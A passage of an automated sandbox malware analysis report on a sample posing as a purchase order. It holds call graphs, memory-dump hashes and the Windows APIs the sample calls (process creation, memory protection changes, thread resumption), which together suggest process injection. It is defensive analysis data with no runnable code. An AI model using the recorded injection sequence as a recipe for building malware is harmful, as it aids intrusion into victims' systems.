60562->60563 60572 5e20538 60563->60572 60576 5e2052c 60563->60576 60568 5e2e56f 60567->60568 60570 5e20538 CreateProcessA 60568->60570 60571 5e2052c CreateProcessA 60568->60571 60569 5e2ea79 60570->60569 60571->60569 60573 5e2053d CreateProcessA 60572->60573 60575 5e207b4 60573->60575 60577 5e20530 CreateProcessA 60576->60577 60579 5e207b4 60577->60579 60584 265d030 60585 265d048 60584->60585 60586 265d0a3 60585->60586 60588 5eedbd0 60585->60588 60589 5eedc29 60588->60589 60592 5eee160 60589->60592 60590 5eedc5e 60593 5eee18d 60592->60593 60594 5eed008 VirtualProtect 60593->60594 60596 5eee323 60593->60596 60595 5eee314 60594->60595 60595->60590 60596->60590 60158 2787de0 60159 2787dfa 60158->60159 60160 2787e0a 60159->60160 60164 5ee6e1e 60159->60164 60167 5ee73f3 60159->60167 60171 5ee6234 60159->60171 60175 5eed008 60164->60175 60168 5ee7412 60167->60168 60170 5eed008 VirtualProtect 60168->60170 60169 5ee01d7 60170->60169 60172 5ee6253 60171->60172 60174 5eed008 VirtualProtect 60172->60174 60173 5ee627a 60174->60173 60177 5eed02f 60175->60177 60179 5eed4e8 60177->60179 60180 5eed531 VirtualProtect 60179->60180 60182 5ee01d7 60180->60182 60601 5e22f08 60602 5e22f09 60601->60602 60606 5e22f48 60602->60606 60611 5e22f39 60602->60611 60603 5e22f33 60607 5e22f75 60606->60607 60608 5e22fdc 60607->60608 60609 5e21498 VirtualProtect 60607->60609 60610 5e214a0 VirtualProtect 60607->60610 60608->60603 60609->60607 60610->60607 60613 5e22f48 60611->60613 60612 5e22fdc 60612->60603 60613->60612 60614 5e214a0 VirtualProtect 60613->60614 60615 5e21498 VirtualProtect 60613->60615 60614->60613 60615->60613 60149 5e381e8 60150 5e381e9 60149->60150 60153 5e38374 60150->60153 60155 5e3837a 60153->60155 60154 5e38497 60155->60154 60156 5e214a0 VirtualProtect 60155->60156 60157 5e21498 VirtualProtect 60155->60157 60156->60155 60157->60155 60580 5e3fca8 60581 5e3fca9 NtProtectVirtualMemory 60580->60581 60583 5e3fd6f 60581->60583 60597 5eee6b0 60598 5eee6f4 VirtualAlloc 60597->60598 60600 5eee761 60598->60600
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 380d269d74af94cb35148d27bd23bb4321c76b4731418c42a26c069dd284b66b
                                              • Instruction ID: 0bf90b586c8eda43a0eaafac576630792583103fe759735bad4a1a1132ddf945
                                              • Opcode Fuzzy Hash: 380d269d74af94cb35148d27bd23bb4321c76b4731418c42a26c069dd284b66b
                                              • Instruction Fuzzy Hash: 25B20834A002188FDB18DF95D894BADBBB6BF88701F1489D9E506AB3A4DB71DD81CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 652 5e3cac8-5e3cae9 653 5e3caf0-5e3cb88 call 5e3d3f8 652->653 654 5e3caeb 652->654 658 5e3cb8e-5e3cbc5 653->658 654->653 660 5e3cbc7-5e3cbd2 658->660 661 5e3cbd4 658->661 662 5e3cbde-5e3ccb0 660->662 661->662 671 5e3ccc2-5e3cced 662->671 672 5e3ccb2-5e3ccb8 662->672 673 5e3d35d-5e3d379 671->673 672->671 674 5e3ccf2-5e3ce1b 673->674 675 5e3d37f-5e3d39a 673->675 684 5e3ce2d-5e3cf7f 674->684 685 5e3ce1d-5e3ce23 674->685 693 5e3cf81-5e3cf85 684->693 694 5e3cfd8-5e3cfdf 684->694 685->684 695 5e3cf87-5e3cf88 693->695 696 5e3cf8d-5e3cfd3 693->696 697 5e3d18a-5e3d1a6 694->697 700 5e3d21a-5e3d269 695->700 696->700 698 5e3cfe4-5e3d0d2 697->698 699 5e3d1ac-5e3d1d0 697->699 724 5e3d186-5e3d187 698->724 725 5e3d0d8-5e3d183 698->725 705 5e3d1d2-5e3d214 699->705 706 5e3d217-5e3d218 699->706 713 5e3d27b-5e3d2c6 700->713 714 5e3d26b-5e3d271 700->714 705->706 706->700 717 5e3d2c8-5e3d33e 713->717 718 5e3d33f-5e3d35a 713->718 714->713 717->718 718->673 724->697 725->724
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8
                                              • API String ID: 0-4194326291
                                              • Opcode ID: fac869b7eeb0eb7086bee100fdacf5a73545446fc4f507eb1f1acca4e83f64a1
                                              • Instruction ID: 8bece22605c960e055038e23458fe891ced9eb733f35c6b7e79b8df4aec3a061
                                              • Opcode Fuzzy Hash: fac869b7eeb0eb7086bee100fdacf5a73545446fc4f507eb1f1acca4e83f64a1
                                              • Instruction Fuzzy Hash: E242B275D00629CBDB64DF69CC54AD9B7B2BF89300F1486EAD44DA7250EB31AE81CF90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 7b878c9856f2dd4dcf393e983c8eea51bd802445510f47a1f70c703c16e1f99d
                                              • Instruction ID: c1bcd3270d0e618b39a21760f813466a32b952c0f7466ddac5e5c205cc5f3759
                                              • Opcode Fuzzy Hash: 7b878c9856f2dd4dcf393e983c8eea51bd802445510f47a1f70c703c16e1f99d
                                              • Instruction Fuzzy Hash: 5D220B34A00214CFDB28DFA5D994BADBBB2BF48701F1485E9E509AB3A4DB719D81CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1168 5e3fca0-5e3fca2 1169 5e3fca4-5e3fca6 1168->1169 1170 5e3fca9-5e3fcac 1168->1170 1171 5e3fca8 1169->1171 1172 5e3fcad-5e3fd6d NtProtectVirtualMemory 1169->1172 1170->1172 1171->1170 1175 5e3fd76-5e3fdc0 1172->1175 1176 5e3fd6f-5e3fd75 1172->1176 1176->1175
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05E3FD5D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: e67d9191e630e5af24dcffa37800fb7977b6d09d004c9c9d7d581ab94dd9169c
                                              • Instruction ID: 11eac29faefeefe082960b193315611085e867bc71e692fddba144a6fcc318e6
                                              • Opcode Fuzzy Hash: e67d9191e630e5af24dcffa37800fb7977b6d09d004c9c9d7d581ab94dd9169c
                                              • Instruction Fuzzy Hash: 24419AB4D00258DFDF10CFAAD985ADEFBB1BB49310F14A42AE829B7210D735A905CF54
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05E3FD5D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: 10b8b3f85cacffa90e5387da320f2cc77a6e255f588284341c4101422fc7285d
                                              • Instruction ID: cbdd4e996acc4da344f3c63e1085d4309b2f7194f668923ce338c9300152bbbf
                                              • Opcode Fuzzy Hash: 10b8b3f85cacffa90e5387da320f2cc77a6e255f588284341c4101422fc7285d
                                              • Instruction Fuzzy Hash: F24199B4D00258DFCF10CFAAD985ADEFBB1BB49310F14A42AE819B7210D735A905CF54
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 05E21256
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 9865b973d195be4ff3b48963e3f9dc44dff6cc23b9fb58bfc19d015a9ddc2071
                                              • Instruction ID: 3aa70d9c2c0b40b3194814f038a953ee1e83cb959c880783ff407029196bd0b6
                                              • Opcode Fuzzy Hash: 9865b973d195be4ff3b48963e3f9dc44dff6cc23b9fb58bfc19d015a9ddc2071
                                              • Instruction Fuzzy Hash: C731DBB5D00228DFDB14CFAAD880A9EFBF1BB49310F10942AE815B7304D735AA05CF94
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 05E21256
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 36a6204cb83074e767e7e827e46fae64e8c951fbd1056c97b4b52cc23027508c
                                              • Instruction ID: 6772fa22b0044fbc541d149a1bc2daf999d77d3f2a163350b8f116c44ee0381e
                                              • Opcode Fuzzy Hash: 36a6204cb83074e767e7e827e46fae64e8c951fbd1056c97b4b52cc23027508c
                                              • Instruction Fuzzy Hash: 0031C9B5D01218DFCB14CFAAD980A9EFBF1BB49310F10942AE819B7300C775A902CF94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .z
                                              • API String ID: 0-3598656969
                                              • Opcode ID: e6c2d838f3efb823a8d2dc9674d4be70838ec1b3cf66a3b4a27198adabf744a8
                                              • Instruction ID: 74ecde272a6e231873016c117822eb863f6043af75c473cb78bc818da1b18858
                                              • Opcode Fuzzy Hash: e6c2d838f3efb823a8d2dc9674d4be70838ec1b3cf66a3b4a27198adabf744a8
                                              • Instruction Fuzzy Hash: 99B1C670E05618DFDF18DFAAD888BADBBF2BF4A300F1094A9D409A7255EB745985CF10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h
                                              • API String ID: 0-2439710439
                                              • Opcode ID: f00f08943a0bb57dec6082ca2cc59ac00d40df8e70341886265bfa7e16ff5e1e
                                              • Instruction ID: 9628bdae4c9ad95123c347a30833285b052c5505319eda3c00c98f6fabe939ca
                                              • Opcode Fuzzy Hash: f00f08943a0bb57dec6082ca2cc59ac00d40df8e70341886265bfa7e16ff5e1e
                                              • Instruction Fuzzy Hash: 2661C371D006298BEB64DF6ACC54BD9B7B2BF89300F14C2AAC44DB7254EB306A85CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7215ac0a957192ca99ac7c031506f9b1a78539d40975f235afa35002427d9a56
                                              • Instruction ID: 61ec427f2d8dbfed6629b83cdf2bb575e44d1b5b4dd8300102df8ecd696d128a
                                              • Opcode Fuzzy Hash: 7215ac0a957192ca99ac7c031506f9b1a78539d40975f235afa35002427d9a56
                                              • Instruction Fuzzy Hash: 65A2C475A00228CFDB65DF69C984B99BBB2FF89304F1581E9D509AB321DB319E81CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e9bf4a3e8a37c631fd0da17f248c58878f454ac536d1b6022dd4022b99d44d1
                                              • Instruction ID: 05d30b20a170443d8d4f59705e4a5cb3caae299926c6e2530a4b4d74087409ef
                                              • Opcode Fuzzy Hash: 0e9bf4a3e8a37c631fd0da17f248c58878f454ac536d1b6022dd4022b99d44d1
                                              • Instruction Fuzzy Hash: 5BE1E374E16219CFDF18CF6AD888BADBBF2FB4A304F1094A9D409A7255EB745985CF00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3889f7e78f13cb9e14afcef07ae645dfec9964aff77a1c5094ae0c53b1e1e954
                                              • Instruction ID: bd2d5d3ed2445d440b5b84276394043fd9571bada5f65b487a99988a0e990e89
                                              • Opcode Fuzzy Hash: 3889f7e78f13cb9e14afcef07ae645dfec9964aff77a1c5094ae0c53b1e1e954
                                              • Instruction Fuzzy Hash: 7FE1E474E16218CFDF18CF6AD848BADBBF2FB4A304F1494A9D409A7255EB745985CF00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59405414e552299267637c3d291510839b8bdeafa973be0181534c33ba8e61f0
                                              • Instruction ID: 7199895c41ee9eb13aabc36399b9a562dd4c5334e390992c84cd2329034a6fc5
                                              • Opcode Fuzzy Hash: 59405414e552299267637c3d291510839b8bdeafa973be0181534c33ba8e61f0
                                              • Instruction Fuzzy Hash: 5ED1E370A05219CFDB69CF6AD888BA9B7F2BB49300F1184E9D40DE7255EB309E85CF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d4510f328d0b3012f85f5dfad2d5cd7c1203504eae4d843b7f402e930ac15bb
                                              • Instruction ID: 93f84f483ad51970050ef7d8a49572416eefec6f196d137b490a9b95a20d3d90
                                              • Opcode Fuzzy Hash: 1d4510f328d0b3012f85f5dfad2d5cd7c1203504eae4d843b7f402e930ac15bb
                                              • Instruction Fuzzy Hash: 9CC13674D05228CFEB58CFA5D844BEDBBF2BB49304F1090A9D489A7259EB385D89CF00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e53dd7ad413ff66ea6ed102de315d492caa7946125b036dd88a69d8a02cd0d9
                                              • Instruction ID: 69f21a9160b7a06f53bf76d6d67a2874eacb5ab0761bc5f00e24f3fc2cbe11b1
                                              • Opcode Fuzzy Hash: 6e53dd7ad413ff66ea6ed102de315d492caa7946125b036dd88a69d8a02cd0d9
                                              • Instruction Fuzzy Hash: 64C13774D05228CFEB54CFA5D844BEDBBF2BB49304F1090A9D489A7259EB785D89CF10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e901ca152915f2a274a50ec981356443277432e314458be58370c5b784f6ad61
                                              • Instruction ID: 0be76b5663be946cb506966ae8a16c1255ef194dc5e12114b76664f414225a87
                                              • Opcode Fuzzy Hash: e901ca152915f2a274a50ec981356443277432e314458be58370c5b784f6ad61
                                              • Instruction Fuzzy Hash: E9D1D574E16219CFDF18CFAAD848BADBBF2FB4A304F1098A9D409A7255DB745985CF00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd21a5139ee8beaf4a3db56cdc82c45cc18f147a6e0a7c6e760cb8da26cd094b
                                              • Instruction ID: ebd262bb82d608953e16ccdf43d291906b3c945de824a111ce832e3638b61b03
                                              • Opcode Fuzzy Hash: cd21a5139ee8beaf4a3db56cdc82c45cc18f147a6e0a7c6e760cb8da26cd094b
                                              • Instruction Fuzzy Hash: 5FD1C274E00619CFDB58DFA9D890B9DBBB2BF89300F1181A9D419AB365DB31AD81CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 32674792a67109ee49452fd716b41463c8e1d3df9e9a0388008cb77eb34badb9
                                              • Instruction ID: 7810c1f1412afe839414fb27b20b12eab44811e60a28605e6d482881f1fae6d9
                                              • Opcode Fuzzy Hash: 32674792a67109ee49452fd716b41463c8e1d3df9e9a0388008cb77eb34badb9
                                              • Instruction Fuzzy Hash: 3FB1EA70D09218CFEB14CFA6D849BEDBBF2BB45304F10A0A9D489E7256EBB55985CF01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e5d3a807d13d16668396d1d16f64a92471bab4571ce031ade580830288586368
                                              • Instruction ID: 9dbace173a7e1d58bb2dd30eddccbf32eab33cc22e599a2b79216217052cd80f
                                              • Opcode Fuzzy Hash: e5d3a807d13d16668396d1d16f64a92471bab4571ce031ade580830288586368
                                              • Instruction Fuzzy Hash: 6FB1F674E06218CFEB54DFA4C948BADBBF2FB48304F5450A9D449AB251EB355D89CF10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2892e78357883c42ea6923ff2dfefca7d369386892e69db281ec51c75754bd6f
                                              • Instruction ID: da54f2d8a66279b4223e69b2383d17ca2744823a617b1bc0b1f74924199a2b02
                                              • Opcode Fuzzy Hash: 2892e78357883c42ea6923ff2dfefca7d369386892e69db281ec51c75754bd6f
                                              • Instruction Fuzzy Hash: 53811774E05218CFDB54DF69D484BEDBBF2BB49304F20A4A9D059A7358EB385886CF14
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9dae9d4adfda6ab6bafb27dcc55760afc170f5383456984fc194d0d2266113e0
                                              • Instruction ID: df6bd6431dfbb3537a85bbfaf263cad28f2e0a3f8dadc07facf905ca490aefaf
                                              • Opcode Fuzzy Hash: 9dae9d4adfda6ab6bafb27dcc55760afc170f5383456984fc194d0d2266113e0
                                              • Instruction Fuzzy Hash: 51812574E05218CFDB54DFA9D484BEDBBF2BB49304F20A4A9D059A7358EB385886CF10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 293923292d49349c9980b24c9fc816c6b5e8f46446d1a16198178d3fc06aef40
                                              • Instruction ID: 9783c77e55f78a813cdf6ced2c369ca21c70bcad7db783c97984336d1bd7abdd
                                              • Opcode Fuzzy Hash: 293923292d49349c9980b24c9fc816c6b5e8f46446d1a16198178d3fc06aef40
                                              • Instruction Fuzzy Hash: 9A71C270D05218DFEB14CFAAC849BDDBBF2BB89304F0091AAD499AB355E7745989CF10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5d65ea9cbb171946e125e2db431986d8932406260b9ff53b9e7f87f456a1e6b
                                              • Instruction ID: bbfe7ab899df50def7c515f6234fcefa4d77397725015a7c7a822a1416704357
                                              • Opcode Fuzzy Hash: d5d65ea9cbb171946e125e2db431986d8932406260b9ff53b9e7f87f456a1e6b
                                              • Instruction Fuzzy Hash: AE61C570D05218DFEB14CFAAC849BDDBBF2BB89304F0491A9D499AB254E7744989CF41

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 287 5c924ac-5c924ba 289 5c92b5b-5c92b5f 287->289 290 5c924c0-5c924c8 287->290 291 5c9298a-5c92991 289->291 292 5c92b65-5c92b6d 289->292 293 5c916f7-5c916ff 290->293 294 5c92810-5c92822 call 6159208 291->294 295 5c92997-5c929bc call 5c91558 291->295 292->293 296 5c91708-5c92356 293->296 297 5c91701-5c917f3 293->297 302 5c92827-5c9285e call 5c91558 294->302 295->293 304 5c929c2-5c929ca 295->304 316 5c9235c-5c92364 296->316 317 5c92297-5c922a1 296->317 311 5c917f9-5c9181e call 5c91558 297->311 312 5c93448-5c93470 call 5c90418 297->312 302->293 308 5c92864-5c9286c 302->308 304->293 308->293 311->293 323 5c91824-5c9182c 311->323 312->293 324 5c93476-5c9347e 312->324 316->293 318 5c922a8-5c922b9 317->318 319 5c922a3 317->319 318->293 319->318 323->293 324->293
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $B
                                              • API String ID: 0-2922798824
                                              • Opcode ID: 2286420e928ea4066e96cc7f60c531e869b28c58ecd38f3502d331022b6e23fd
                                              • Instruction ID: c412f5b5d604d2b29961e3fff9a4175ee8bfd0c38a7de17681b1b038bb89802b
                                              • Opcode Fuzzy Hash: 2286420e928ea4066e96cc7f60c531e869b28c58ecd38f3502d331022b6e23fd
                                              • Instruction Fuzzy Hash: 5E11B270D1525ACFDF25DF64C98DBECBAB1FB09315F1818AAC40972240C7794A95CF14

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 732 5e2052c-5e2052e 733 5e20530-5e20533 732->733 734 5e20535-5e20536 732->734 733->734 735 5e20538-5e2053c 734->735 736 5e2053d-5e205ca 734->736 735->736 738 5e20613-5e2063b 736->738 739 5e205cc-5e205e3 736->739 742 5e20681-5e206d7 738->742 743 5e2063d-5e20651 738->743 739->738 744 5e205e5-5e205ea 739->744 752 5e206d9-5e206ed 742->752 753 5e2071d-5e207b2 CreateProcessA 742->753 743->742 754 5e20653-5e20658 743->754 745 5e205ec-5e205f6 744->745 746 5e2060d-5e20610 744->746 749 5e205fa-5e20609 745->749 750 5e205f8 745->750 746->738 749->749 751 5e2060b 749->751 750->749 751->746 752->753 761 5e206ef-5e206f4 752->761 768 5e207b4-5e207ba 753->768 769 5e207bb-5e20831 753->769 755 5e2065a-5e20664 754->755 756 5e2067b-5e2067e 754->756 758 5e20666 755->758 759 5e20668-5e20677 755->759 756->742 758->759 759->759 762 5e20679 759->762 763 5e206f6-5e20700 761->763 764 5e20717-5e2071a 761->764 762->756 766 5e20702 763->766 767 5e20704-5e20713 763->767 764->753 766->767 767->767 770 5e20715 767->770 768->769 775 5e20833-5e20837 769->775 776 5e20841-5e20845 769->776 770->764 775->776 777 5e20839 775->777 778 5e20847-5e2084b 776->778 779 5e20855-5e20859 776->779 777->776 778->779 782 5e2084d 778->782 780 5e2085b-5e2085f 779->780 781 5e20869 779->781 780->781 783 5e20861 780->783 784 5e2086a 781->784 782->779 783->781 784->784
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05E2079F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 458a91d72d51c60c656b5bcbd99dd23f09ecf3f4e8f8801aaab7436ee03d0946
                                              • Instruction ID: ac91270565b1e467c065cf43ec9b00e5f19d70b00516ae8e84f541f838fe22fd
                                              • Opcode Fuzzy Hash: 458a91d72d51c60c656b5bcbd99dd23f09ecf3f4e8f8801aaab7436ee03d0946
                                              • Instruction Fuzzy Hash: C9A11871D00228DFDF14CFA9C8497EEBBF1BB49304F14A169E899A7284DB748985CF85

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
